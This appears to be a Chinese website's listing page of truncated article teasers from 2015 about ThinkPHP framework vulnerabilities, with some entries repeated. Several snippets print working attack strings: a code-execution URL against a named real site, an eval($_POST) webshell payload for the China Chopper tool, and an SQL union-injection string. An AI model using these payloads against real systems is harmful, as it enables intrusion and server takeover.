-
康师傅玩转台湾活动站使用thinkphp导致命令执行
thinkphp 2.1造的孽详细说明:http://ksftea.com/index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D www.2cto.com修复方案:升级作者 random_...
栏目:网站安全 点击:33 日期:2015-04-17 -
thinkphp框架任意代码执行漏洞利用及修复 - 网站安
thinkphp是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为thinkphp,并且遵循Apache2开源协议发布。早期的思...
栏目:网站安全 点击:35 日期:2015-04-17 -
康师傅某站thinkphp 2.1 PHP任意代码执行 - 网站安全
这个站使用的是thinkphp 2.1,存在代码执行漏洞,直接getshell详细说明:就是康师傅红茶、绿茶以及其他各种茶瓶身上的那个活动康师傅 - 玩转台湾 10000人大搜茶http://www.ksftea.com/系统使用...
栏目:网站安全 点击:82 日期:2015-04-17 -
飞飞影视系统2.0.120220(Beta4)版thinkphp任意代码执行
第一个方法 直接执行http://www.2cto.com /index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html直接拿菜刀连接。第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,依次执行下边...
栏目:网站安全 点击:161 日期:2015-04-17 -
thinkphp框架下mysql注入 - 网站安全 - 自学php
Wamp环境,用thinkphp框架制作,手工检测发现一个注入点。/content/117 xand 1=2 union select @@datadir,2,3,4,5,6x这个注入点同时还是一个反射型xss,id值被写入到了内联js里。接着提交and 1=2 union ......
栏目:网站安全 点击:47 日期:2015-04-17 -
thinkphp的Ubb标签漏洞读取任意内容 - 网站安全 -
简要描述:thinkphp的Ubb标签,有一个代码高亮的功能,即满足:xxx[ c ode]或者[p hp]xxx[ p hp]的时候,会对中间的xxx读取,并高亮,xxx是路径,而非具体的代码,如下图1,输入路径后,当文件存...
栏目:网站安全 点击:39 日期:2015-04-16 -
易酷cms本地包含导致getwebshell(thinkphp) - 网站安全
通过本地包含直接getwebshell,直接控制整个网站权限。漏洞文件:core Lib Action Home MyAction class php?phpclass MyAction extends HomeAction{ public function index(){$this-show();}...
栏目:网站安全 点击:52 日期:2015-04-16 -
thinkphp的Ubb标签漏洞读取任意内容 - 网站安全 -
简要描述:thinkphp的Ubb标签,有一个代码高亮的功能,即满足:xxx[ c ode]或者[p hp]xxx[ p hp]的时候,会对中间的xxx读取,并高亮,xxx是路径,而非具体的代码,如下图1,输入路径后,当文件存...
栏目:黑客攻防 点击:52 日期:2015-04-15 -
易酷cms本地包含导致getwebshell(thinkphp) - 网站安全
通过本地包含直接getwebshell,直接控制整个网站权限。漏洞文件:core Lib Action Home MyAction class php?phpclass MyAction extends HomeAction{ public function index(){$this-show();}...
栏目:黑客攻防 点击:61 日期:2015-04-15 -
thinkphp3.1 安全快速入门 - 网站安全 - 自学php
对于WEB应用来说,SQL注入攻击无疑是首要防范的安全问题,系统底层对于数据安全方面本身进行了很多的处理和相应的防范机制,例如: $U...
栏目:黑客攻防 点击:50 日期:2015-04-15